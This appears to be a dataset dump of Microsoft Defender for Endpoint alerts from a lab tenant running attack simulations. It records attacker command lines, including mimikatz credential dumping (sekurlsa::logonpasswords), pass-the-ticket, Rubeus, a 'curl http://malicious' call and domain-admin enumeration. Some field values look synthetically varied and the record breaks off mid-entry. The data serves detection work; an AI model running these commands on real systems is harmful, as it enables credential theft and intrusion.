alertId
stringclasses
278 values
providerAlertId
stringclasses
278 values
incidentId
int64
486
989
serviceSource
stringclasses
2 values
creationTime
stringdate
2022-09-30 05:04:51
2023-01-24 06:03:50
lastUpdatedTime
stringdate
2022-11-12 01:35:42
2023-01-24 06:05:47
resolvedTime
stringclasses
23 values
firstActivity
stringdate
2022-09-07 09:25:00
2023-01-24 05:31:07
lastActivity
stringdate
2022-09-30 05:00:00
2023-01-24 05:43:53
title
stringclasses
62 values
description
stringclasses
51 values
category
stringclasses
12 values
status
stringclasses
2 values
severity
stringclasses
4 values
investigationId
int64
20
64
investigationState
stringclasses
9 values
classification
stringclasses
1 value
determination
stringclasses
1 value
detectionSource
stringclasses
7 values
detectorId
stringclasses
48 values
assignedTo
stringclasses
3 values
actorName
stringclasses
1 value
threatFamilyName
stringclasses
6 values
mitreTechniques
listlengths
0
8
devices
listlengths
1
6
entities
listlengths
0
49
entityType
stringclasses
2 values
evidenceCreationTime
stringclasses
469 values
verdict
stringclasses
5 values
remediationStatus
stringclasses
2 values
accountName
stringclasses
30 values
domainName
stringclasses
17 values
userSid
stringclasses
22 values
aadUserId
stringclasses
8 values
userPrincipalName
stringclasses
14 values
sha1
stringclasses
28 values
sha256
stringclasses
27 values
fileName
stringclasses
21 values
filePath
stringclasses
13 values
processId
int64
0
20.7k
processCommandLine
stringclasses
67 values
processCreationTime
stringclasses
133 values
parentProcessId
int64
0
14.6k
parentProcessCreationTime
stringclasses
63 values
parentProcessFileName
stringclasses
14 values
parentProcessFilePath
stringclasses
11 values
detectionStatus
stringclasses
1 value
deviceId
stringclasses
9 values
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-09-30T06:14:52.4166667Z
Suspicious
None
svc_acct
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T20:31:59.7933333Z
Unknown
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T20:34:24.9733333Z
Suspicious
None
user1
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T15:41:46.9633333Z
Suspicious
None
bob
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638045932698230916_1344612009
66b2987b-84bd-4e3e-a885-888fc91a459b
765
MicrosoftDefenderForEndpoint
2022-11-21T02:07:49.8231081Z
2022-11-21T02:07:53.5166667Z
null
2022-11-21T01:55:47.8840459Z
2022-11-21T02:04:42.8559403Z
Suspicious System Service Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
New
Low
null
UnsupportedAlertType
null
null
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
null
null
null
[ "T1007", "T1059.001" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "rnd.local", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:07:49.8666667Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:07:49.8666667Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z", "parentProcessFileName": "explorer.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 4680, "processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Downloads'", "processCreationTime": "2022-11-21T02:01:28.4753286Z", "processId": 11068, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:07:49.8666667Z", "fileName": "explorer.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:25.9825113Z", "parentProcessFileName": "userinit.exe", "parentProcessFilePath": null, "parentProcessId": 4684, "processCommandLine": "Explorer.EXE", "processCreationTime": "2022-11-10T07:07:26.0872385Z", "processId": 4680, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d", "sha256": "8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T15:03:42.41Z
Suspicious
None
darol
corp.local
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-12-22T08:58:22.4333333Z
Suspicious
None
ronhd
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1111
null
ronhd@msdxv8.m365dpoc.com
fc870d086c53ded2e94300f7569aa9478186f2c7
a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1
Rubeus.exe
C:\Temp
2,536
whoami /all
2022-12-22T08:47:51.8048258Z
5,228
2022-12-22T08:47:51.6930217Z
cmd.exe
C:\Windows\System32
Detected
4f111b3b2366eacdcc66d7ad73548fff9b039c15
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-11T08:18:37.01Z
Suspicious
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
6,044
curl http://malicious
2022-11-11T08:17:06.3382251Z
4,704
2022-11-11T08:16:44.2952776Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T13:27:33.96Z
Suspicious
None
darol
test.domain
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T20:34:24.9733333Z
Suspicious
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-18T04:42:55.3033333Z
Benign
None
Takeshi
TMTOWER-BOOK
S-1-5-21-7316772-2057538409-3008203053-1001
null
null
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
10,396
"mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit
2022-11-18T04:38:47.7166801Z
14,616
2022-11-14T04:36:16.5242809Z
powershell.exe
\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0
Detected
83b06aa80899050e5d4132992e36b5b8f14b64e9
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T07:33:30.1733333Z
Suspicious
None
darol
prod.env
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T17:23:28.5433333Z
Suspicious
None
admin
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:13:00.7233333Z
Benign
None
jeff
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:05:47.11Z
Suspicious
Active
guest
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
70df765f554ed7392200422c18776b8992c09231
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
mimikatz.exe
C:\M365DAttack\Mimikatz\x64
1,648
"mimikatz.exe" privilege::debug "kerberos::ptt C:\M365DAttack\Admin-Tickets" exit
2022-11-21T02:02:26.7968671Z
11,068
2022-11-21T02:01:28.4753286Z
powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0
Detected
c7e147cb0eb3534a4dcea5acb8e61c933713b145
da638045930236864359_-743961971
479e0b88-c4a8-4b82-8d31-90abda7894c1
765
MicrosoftDefenderForEndpoint
2022-11-21T02:03:43.686456Z
2022-11-26T01:35:43.17Z
2022-11-26T01:35:43.0633333Z
2022-11-21T01:55:47.8840459Z
2022-11-21T02:32:54.3762442Z
Suspicious sequence of exploration activities
A process called a set of windows commands. These commands can be used by attackers in order to identify assets of value and coordinate lateral movement after compromising a machine.
Discovery
Resolved
Low
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
acfdcbd1-cf72-47be-8e52-6cadc507656d
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1016", "T1018", "T1033", "T1049", "T1087", "T1087.001", "T1135" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "lab.net", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "None", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-21T02:03:43.73Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:03:43.73Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" user /domain", "processCreationTime": "2022-11-21T02:01:37.7396253Z", "processId": 1768, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:03:43.93Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group /domain", "processCreationTime": "2022-11-21T02:01:37.8071047Z", "processId": 10556, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:03:49.1866667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain", "processCreationTime": "2022-11-21T02:01:37.8813359Z", "processId": 2852, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:03:53.0433333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group \"Enterprise Admins\" /domain", "processCreationTime": "2022-11-21T02:01:37.9436798Z", "processId": 7332, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:03:54.14Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" user ronhd /domain", "processCreationTime": "2022-11-21T02:01:38.3775538Z", "processId": 2968, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:07:50.1033333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" user ronhd /domain", "processCreationTime": "2022-11-21T02:05:25.4319033Z", "processId": 10372, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:07:50.2166667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" user /domain", "processCreationTime": "2022-11-21T02:05:24.8384977Z", "processId": 6268, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:07:50.9366667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group /domain", "processCreationTime": "2022-11-21T02:05:24.90337Z", "processId": 10368, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:07:51.1666667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain", "processCreationTime": "2022-11-21T02:05:24.9652512Z", "processId": 10436, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:07:51.3566667Z", "fileName": "net.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group \"Enterprise Admins\" /domain", "processCreationTime": "2022-11-21T02:05:25.0260612Z", "processId": 11708, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:07:51.58Z", "fileName": "explorer.exe", "filePath": "C:\\Windows", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:25.9825113Z", "parentProcessFileName": "userinit.exe", "parentProcessFilePath": null, "parentProcessId": 4684, "processCommandLine": "Explorer.EXE", "processCreationTime": "2022-11-10T07:07:26.0872385Z", "processId": 4680, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d", "sha256": "8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:13:50.8933333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\system32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" user /domain", "processCreationTime": "2022-11-21T02:11:21.6460294Z", "processId": 11100, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-21T02:13:51.5533333Z", "fileName": "net.exe", "filePath": "C:\\Windows\\system32", "ipAddress": null, "parentProcessCreationTime": "2022-11-21T02:01:28.4753286Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 11068, "processCommandLine": "\"net.exe\" group /domain", "processCreationTime": "2022-11-21T02:11:21.7450764Z", "processId": 4224, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0", "sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { 